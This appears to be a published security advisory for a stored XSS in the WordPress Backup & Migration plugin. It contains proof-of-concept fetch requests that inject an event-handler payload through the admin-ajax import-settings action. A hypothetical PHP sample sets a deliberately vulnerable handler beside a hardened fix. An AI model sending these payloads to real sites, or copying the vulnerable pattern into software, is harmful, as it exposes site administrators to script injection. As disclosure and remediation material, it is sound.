wpexploit | Krzysztof Zając (CERT PL) | WPEX-ID: 7F935916-9A1A-40C7-B6D8-EFCC46EB8EAF
History: Nov 06, 2023 - 12:00 a.m.

WordPress Backup & Migration < 1.4.5 - Subscriber+ Stored XSS


AI Score: 5.6 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 14.0%)

Description: The plugin does not sanitise and escape some parameters, which could allow users with a role as low as Subscriber to perform Cross-Site Scripting attacks. This was partially fixed in version 1.4.4 but it still allowed XSS attacks from Admin users.

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "settings_data%5Bim_data_size_per_req%5D=1&settings_data%5Bim_db_file_per_req%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(%2FXSS%2F)+x&action=mgdp_plugin_save_import_settings",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

Then an admin needs to open http://127.0.0.1:8001/wp-admin/admin.php?page=wp-migration-duplicator#wt-mgdp-import and expand the advanced options.
---
On version 1.4.4, a site admin must run the following command on the Backup & Migration page:

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "settings_data%5Bim_data_size_per_req%5D=1&settings_data%5Bim_db_file_per_req%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(%2FXSS%2F)+x&action=mgdp_plugin_save_import_settings&_wpnonce=" + wp_migration_duplicator_import.nonces.main,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
})
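To make the fix concrete, here is an added illustration of the bug class the advisory describes and its remediation. This is hypothetical code written for this page, not the plugin's actual source: the field names and the AJAX action come from the advisory, the hook name follows the WordPress wp_ajax_{action} convention, and the option name and nonce action string are assumptions.

```php
<?php
// Hypothetical illustration (not the plugin's real code) of the vulnerable
// shape described in the advisory, followed by a hardened version.

// --- Vulnerable shape (before): raw input stored, then echoed unescaped ---
function mgdp_save_import_settings_vulnerable() {
    // No nonce check (the 1.4.4 PoC adds _wpnonce, so 1.4.4 added one),
    // no capability check, and no sanitisation of the submitted values.
    update_option( 'mgdp_import_settings', $_POST['settings_data'] );
    wp_send_json_success();
}

function mgdp_render_import_settings_vulnerable() {
    $opt = get_option( 'mgdp_import_settings', array() );
    // A stored value beginning with a double quote closes the attribute and
    // injects new attributes, which run in every admin who opens the page.
    echo '<input name="settings_data[im_db_file_per_req]" value="' . $opt['im_db_file_per_req'] . '">';
}

// --- Hardened shape (after) ---
function mgdp_save_import_settings_hardened() {
    // CSRF protection: the nonce action name here is an assumption.
    check_ajax_referer( 'mgdp_import_settings_nonce', '_wpnonce' );
    // Authorisation: a Subscriber must not be able to reach this handler at all.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $in = isset( $_POST['settings_data'] ) ? (array) wp_unslash( $_POST['settings_data'] ) : array();
    // Both fields are counts, so coerce them to non-negative integers;
    // no markup can survive this regardless of who submits it.
    $clean = array(
        'im_data_size_per_req' => absint( $in['im_data_size_per_req'] ?? 0 ),
        'im_db_file_per_req'   => absint( $in['im_db_file_per_req'] ?? 0 ),
    );
    update_option( 'mgdp_import_settings', $clean );
    wp_send_json_success( $clean );
}

function mgdp_render_import_settings_hardened() {
    $opt = get_option( 'mgdp_import_settings', array() );
    // Escape at output as a second layer, even though the stored value is an integer.
    printf(
        '<input name="settings_data[im_db_file_per_req]" value="%s">',
        esc_attr( $opt['im_db_file_per_req'] ?? '' )
    );
}

add_action( 'wp_ajax_mgdp_plugin_save_import_settings', 'mgdp_save_import_settings_hardened' );
```

Note that the nonce alone (the 1.4.4 state) stops cross-site submission but not self-persisted XSS by an admin; the integer coercion and output escaping are what remove the injection.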
